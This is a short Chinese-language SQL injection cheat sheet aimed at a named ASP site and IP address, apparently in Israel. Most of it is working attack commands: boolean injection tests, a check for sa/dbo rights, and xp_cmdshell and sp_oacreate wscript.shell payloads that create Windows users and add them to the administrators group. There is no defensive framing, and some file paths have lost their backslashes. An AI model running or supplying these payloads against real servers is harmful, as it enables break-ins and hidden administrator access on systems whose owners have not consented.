注入点:asp"> cc=0102041102 IP:192.117.122.145 以色列 inurl:asp
具体脚本命令:
1.判断是否有注入;and 1=1 ;and 1=2
;and user_name()=dbo 判断当前系统的连接用户是不是sa
2.添加系统的管理员
;exec master.dbo.xp_cmdshell net user jiaozhu jiaozhu /add;--
;exec master.dbo.xp_cmdshell net localgroup administrators jiaozhu /add;--


declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:windowssystem32cmd.exe /c
这段命令是通过SQL执行系统命令的
例如:
declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:windowssystem32cmd.exe /c net user jiss 111 /add
这段命令是通过SQL执行系统命令的